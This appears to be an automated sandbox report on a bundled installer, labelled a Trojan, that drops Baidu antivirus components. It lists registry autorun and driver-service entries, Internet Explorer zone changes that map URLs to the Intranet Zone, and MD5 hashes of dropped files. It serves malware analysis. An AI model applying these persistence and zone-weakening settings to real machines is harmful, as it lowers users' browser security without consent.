[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 71 9E 3C 0D 63 E2 61 C2 FB D3 E1 0A 4F 6A D0"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\HELPDIR]
"(Default)" = ""

The process regsvr32.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F F6 38 0A 7D 97 9D D3 DF 05 A4 B3 C6 06 2B 3A"

[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll"
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}]
"(Default)" = "U盘防护"

The process BDALeakfixer.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 76 B7 E6 15 79 BC 6A 18 C6 B8 43 45 A3 7A B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAn.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 7C 15 E4 69 33 2F 19 AE 2E 6D 77 26 B5 CD FC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process BaiduAn.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C E8 9A 45 08 DD CF BE DB 4A 22 26 34 B7 10 4E"

The process BaiduSdBugRpt.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 62 36 76 0D 94 71 92 3D B2 54 6F 43 D7 63 CA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process BaiduSdUpdate.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 55 CD F2 62 64 E0 18 C7 E4 9C BC CE 56 0E B5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduSdUpdate.exe:2228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 66 9F 73 E1 8D 2C 1C B8 99 FB 78 3A 3A 3E 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAnSvc.exe:3768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 82 47 CB B2 28 84 0F 65 43 C6 B7 B0 8E E9 75"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAnSvc.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 42 A9 9B D4 D3 8C 18 67 99 70 55 28 C0 D1 F9"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = ""

"InstallDate" = ""

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_gj" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"
"VirusTime" = ""
"SupplyID" = ""

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\BDEnhanceBoost]
"Start" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"

The process BaiduSdSvc.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DisplayName" = "BDMWrench"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ImagePath" = "system32\DRIVERS\BDMWrench.sys"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Description" = "BDMWrench"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度杀毒功能组件"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Tag" = "5"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
"Tag" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 47 09 53 FA 97 48 18 BF 47 64 39 0F 07 61 E3"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_sd" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = ""

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "COM Infrastructure"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"

"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Start" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\BDMWrench\Security]
[HKLM\System\CurrentControlSet\Services\BDMWrench]
[HKLM\System\CurrentControlSet\Services\BDMWrench\Enum]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DeleteFlag"

Dropped PE files

MD5 File path
40bc0f5d3bb961b7b76276f0292fd708 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\F1023_s_30803.exe
9fa45f9017584f7a73f7359dad2caf26 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\BDMSkin.dll
f1a3e3d2552723cf46f1e9aaa4741877 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll
17c360226bee79f8e544907084f599e8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll
40bc0f5d3bb961b7b76276f0292fd708 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe
123df1ab69a1d32b42a9d6c797ac5447 c:\Program Files\Common Files\Baidu\BDDownload\108\7z.dll
c7ac6fdc3f233399708cdf5edb4f7343 c:\Program Files\Common Files\Baidu\BDDownload\108\bdcomproxy.dll
2ecb6110aade861f16c9ca210f3ea005 c:\Program Files\Common Files\Baidu\BDDownload\108\bddownloader.exe
2619bdb16bafaec8304fae07e459f321 c:\Program Files\Common Files\Baidu\BDDownload\108\dl.dll
9156ae112ea0989ef04dfe5e97f17b4e c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll
676835dc52b67fc7150e9c6336da6556 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll
a0e2fc0daea50c40aba3c90db558bcce c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll
9f1c8cf481b790de9cd2275505dd1bac c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll
d9cce68f84f576bd244c91fb6df7d73d c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll
bad438e36d73f20cb60e738fb9974198 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll
89d798adf093aebaf041fd0197ede893 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll
34615a5c3ad5b59208d57674cb0f26fe c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll
dce4321312ff1fc63323d6b6a9f06522 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll
c1ae08fe4bb466d651fdc4d3a943bdeb c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll
d4c2ce04bad7eb4d408118021e85dddb c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll
cdb1722edcaf6a211344d80e30f2c295 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll
06792f4af5c6d9b02be39ada55d2fbd7 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll
ed5776988c1f89b6b3b24a3e174f1218 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll
605fcf4a03fe970725008fdaab511818 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll
6946e725d396a13c44529adbe63c4ecc c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll
d280f73128561a62e8709fd81faa6097 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll
0177e3ded91fa30a3514e642c215d277 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe
af88ec6399f527720b342482e1a03cb8 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe
92c3bc063c1fc4acf176b8e7364c96d7 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll
734b342d7091f44c1deeeb8be3313a8c c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe
9474fcb760cd07111a05a0159138b9d2 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll
ec1059187b4cd5cf1f3d743a8b2693ff c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll
ae6b6a43cead19395446ee132b787249 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
1fc801576f8b397276245edf7039b427 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll
04116475cff6d3305a8233c8342ffa88 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys
85e228f2d13456e145dd756b4d7fc6e2 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll
d5402c14fd9a98a47614f2e8fdfdfbca c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll
947ccea3196c6d67babd6c4d5ca71d50 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll
3f40b1504d7696ba7341f7ba465e3b56 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll
1c7a49db64849cdfaf0d9010661e6385 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll
9b664677838ed675f52337e910e0dc6c c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll
3b4ef9c679537e2632ffbdbb0186f1b0 c:\Program Files\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll
bd41d5bb8e1a290fc17cb963522c0099 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll
1b8c4af1ac0cee8301b10e5aa15751e7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll
f01e5681328e98ea61465eb3d894078e c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll
2794ecd5040fcd59772d215c10f56470 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll
fd875b7677013cb59776fb1633c061bc c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll
0f893b451ce2e3dcc6fb17eb6ddf7e43 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll
6075d26c90a855f6a852f435d8e695eb c:\Program Files\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll
d1fdc340269ec3326eee750ff8bc359b c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDConfig.dll
923cc6aaf4c48002c1c96faa77367071 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDCooly.dll
4f2cfb572029ac7bea92412b3f18670d c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll
c5533d7d431938cf63ae27bb7cd561cc c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll
31dd6c0b6da00047dcc24faa1fcb3c46 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll
7169568c9d40e606231eda197db86d9f c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll
79e8dc5bff7304f2e749bd7a3ede966e c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll
d0352acd1acbb264b93a4d4718115ce2 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll
87b28b0d55af94230442446ae6073be7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll
8ec7a9dade53bc0ea8d6b65f564e21c7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe
5510bdc5bae1f0cc430b7b32c7948bb0 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll
359bbf27d9f71185351ea635202ebed3 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll
3fe09f45335f290cad98e80ea59893fb c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll
28f81cdb8871f62237efc4750df5e54f c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll
68e4ebe183d32eff69d83aca52fdb335 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll
2ae0a5334f559ba4f1944a2e60de2778 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll
fff0616db65911080007bac98e198854 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMNet.dll
047bfa4e2dd76866c2497433efee37cd c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll
e4ad30b794a43e48da82eb66de87d316 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMReport.dll
0b0edc38e7ac2c378bb79ab62375eef1 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll
c7087e78c232b8919990539953a2d2c7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll
b8e15a6d8b5208a0d0dee8b93dbf2160 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll
fbcf33e8388bcadd5a98186cb1a954a5 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll
ac39daf741186cac2cb39967bf3f3ed4 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll
f106d55b6b37793829dfee5b03a4917d c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll
39ad853ef66059994900e083e9fa4a8b c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll
c44bc8da33cae81d76fdd4a0285dc28e c:\Program Files\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll
3f34b9074ffa20a4712fbc2bde5df727 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe
48ec40617c6b7d7d319f0648dc1e43b0 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe
6a9766f5b15ce63bca734cf0da6b9c09 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe
89418d3900eb4a2f0a8711f476c4b5ce c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe
656e264a38633623ae060e29578e2129 c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe
2d79c25c5c36081f9be5a644616b523b c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe
e9babe25db0493a84c8854b831ca63bd c:\Program Files\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe
23e5fbdc96d55dfb9a26e36081a5569f c:\Program Files\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe
97576609781bf4d4fdb916a4b2352540 c:\Program Files\baidu\BaiduSd\2.1.0.3086\DriverManager.dll
af91977a6e11df402f8318cb286fdfc3 c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll
733f326a12b12ce6e628ffd9d7fba47a c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll
815632cea661098fafc34400a8a4d42e c:\Program Files\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll
379704add22ef7576ee44cae85b39242 c:\Program Files\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll
c30f5e1c544a396079a91ee0133971a3 c:\Program Files\baidu\BaiduSd\2.1.0.3086\ad.dll
df636a0b62a7b2627fc9b2d350b4bc97 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll
a6b8d4596009dfdae37bcc14d9904201 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll
98bf84947e98aa85d22f8a0144bbf7f9 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll
400aa2fc8af4b6b251ecfea115d5aaad c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll
d1eab731b9eb18c4b13000b9a1c3d84e c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll
09829203238dca6f960c9e30aac4dfaf c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll
997a38d43d043e31c8f4550793a81b74 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll
20ac34370b7e1780339cbfd3b085a6a4 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll
09809686fef1a0db344d839a72b2f7ae c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll
6ae8aa8348ed430cae50efb884be5193 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll
d2b5c85c7708a619acc60c518bb451ac c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll
ab5e37a075539acb8976b7d7eb649222 c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll
8c35a808addc5877258a03af691c30be c:\Program Files\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll
2619bdb16bafaec8304fae07e459f321 c:\Program Files\baidu\BaiduSd\2.1.0.3086\dl.dll
34e11d25672bdf576c0bf780ee757ec5 c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys
b6edb1e0321c5f2f75352832ce21b507 c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys
233c96e5369ef4b58ab606c2b150b65a c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys
9156ae112ea0989ef04dfe5e97f17b4e c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll
676835dc52b67fc7150e9c6336da6556 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll
a0e2fc0daea50c40aba3c90db558bcce c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll
9f1c8cf481b790de9cd2275505dd1bac c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll
